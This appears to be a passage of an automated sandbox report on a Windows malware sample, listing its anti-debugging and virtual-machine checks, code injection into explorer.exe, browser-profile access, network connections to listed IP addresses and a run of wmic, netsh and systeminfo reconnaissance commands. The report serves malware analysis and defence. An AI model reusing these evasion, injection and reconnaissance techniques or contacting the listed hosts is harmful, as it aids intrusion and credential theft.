Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE2FB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose, 8_2_00007FF6DFE2FB4C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose, 10_2_006E2B15
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose, 10_2_006E1D4A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose, 10_2_006E3ED9
Source: C:\Windows\explorer.exe Code function: 13_2_00CB30A8 FindFirstFileW,FindNextFileW,FindClose, 13_2_00CB30A8
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_004010E0 GetNumberFormatW,EnumCalendarInfoA,SetFileAttributesW,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,CopyFileW,GetStdHandle,GetComputerNameW,ClearCommBreak,InterlockedDecrement,EnumCalendarInfoA,GetTempPathA,_memset,CommConfigDialogW,GetVersionExW,CreateActCtxA,InterlockedIncrement,GetShortPathNameA,EnumCalendarInfoA,GetLocaleInfoA,SetVolumeMountPointA,GlobalWire,CreateEventW, 38_2_004010E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E6512 GetSystemInfo, 10_2_006E6512
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\ Jump to behavior
Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: B126.tmp.10.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: B126.tmp.10.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2091336304.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: B126.tmp.10.dr Binary or memory string: global block list test formVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003042000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003052000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003000000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: B126.tmp.10.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: B126.tmp.10.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: B126.tmp.10.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: B126.tmp.10.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: B126.tmp.10.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: B126.tmp.10.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: B126.tmp.10.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2093454201.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: B126.tmp.10.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000002.00000000.2092180745.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: B126.tmp.10.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2093454201.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: B126.tmp.10.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: ROUTE.EXE, 00000021.00000002.3493412295.000001BF53BD9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllFF
Source: explorer.exe, 00000002.00000000.2093454201.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: B126.tmp.10.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: FDDB.exe, 00000008.00000002.4489409357.0000021DDD8E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fo & echo 1369111422311351951369111422\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77023-AAOEM\r\nOriginal Install Date: 03/10/2023, 10:57:18\r\nSystem Boot Time: 24/09/2023, 16:13:49\r\nSystem Manufacturer: VVO2mvF2kM2e VE\r\nSystem Model: xFgTSuDp\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: 9YSUS 3PKM9, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'922 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'171 MB\r\nVirtual Memory: In Use: 1'020 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: GvDH5\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.5\r\n [02]: fe80::357a:d50d:a849:be2d\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n1369111422311351951369111422\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2092180745.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: B126.tmp.10.dr Binary or memory string: discord.comVMware20,11696428655f
Source: B126.tmp.10.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: B126.tmp.10.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: B126.tmp.10.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: B126.tmp.10.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: FDDB.exe, 00000008.00000002.4489924500.0000021DDF5E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: B126.tmp.10.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: B126.tmp.10.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: B126.tmp.10.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: B126.tmp.10.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: B126.tmp.10.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: B126.tmp.10.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: B126.tmp.10.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: B126.tmp.10.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: B126.tmp.10.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: explorer.exe, 0000000A.00000003.3137125800.0000000003032000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tion PasswordVMware20,11696428655}
Source: explorer.exe, 00000002.00000000.2092180745.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: B126.tmp.10.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: B126.tmp.10.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2092180745.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: B126.tmp.10.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000002.00000000.2091336304.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\9VgIkx4su0.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\9VgIkx4su0.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav System information queried: CodeIntegrityInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00191B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock, 15_2_00191B17
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_0040471A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_0040471A
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00191016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, 15_2_00191016
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE278EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process, 8_2_00007FF6DFE278EC
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_00620FE3 push dword ptr fs:[00000030h] 0_2_00620FE3
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_0209092B mov eax, dword ptr fs:[00000030h] 0_2_0209092B
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_02090D90 mov eax, dword ptr fs:[00000030h] 0_2_02090D90
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_005DF31B push dword ptr fs:[00000030h] 4_2_005DF31B
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_0209092B mov eax, dword ptr fs:[00000030h] 4_2_0209092B
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_02090D90 mov eax, dword ptr fs:[00000030h] 4_2_02090D90
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_0056092B mov eax, dword ptr fs:[00000030h] 6_2_0056092B
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_00560D90 mov eax, dword ptr fs:[00000030h] 6_2_00560D90
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_006BF374 push dword ptr fs:[00000030h] 6_2_006BF374
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_005E092B mov eax, dword ptr fs:[00000030h] 7_2_005E092B
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_005E0D90 mov eax, dword ptr fs:[00000030h] 7_2_005E0D90
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_0076ED24 push dword ptr fs:[00000030h] 7_2_0076ED24
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE22654 GetProcessHeap,RtlReAllocateHeap, 8_2_00007FF6DFE22654
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_0040635C SetUnhandledExceptionFilter, 38_2_0040635C
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_0040471A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_0040471A
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_00403FC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 38_2_00403FC0
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 39_2_0040635C SetUnhandledExceptionFilter, 39_2_0040635C
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 39_2_0040471A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_0040471A
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 39_2_00403FC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 39_2_00403FC0

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 3E40.exe.2.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 187.131.253.169 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 190.224.203.37 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.145.40.164 443 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 23.145.40.162 443 Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Thread created: C:\Windows\explorer.exe EIP: 30519A8 Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Thread created: unknown EIP: 11419A8 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Thread created: unknown EIP: 87A1970 Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Thread created: unknown EIP: 2FE1970 Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\explorer.exe Memory written: PID: 6580 base: B779C0 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 6824 base: 7FF6747E2D10 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 2180 base: B779C0 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 4444 base: 7FF6747E2D10 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 3944 base: B779C0 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 1976 base: 7FF6747E2D10 value: 90 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B779C0 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B779C0 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B779C0 Jump to behavior
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Windows\SysWOW64\explorer.exe Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe 18_2_02FE10A5
Source: C:\Windows\SysWOW64\explorer.exe Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe 18_2_02FE1016
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Process created: C:\Windows\System32\cmd.exe cmd Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ROUTE.EXE route print Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
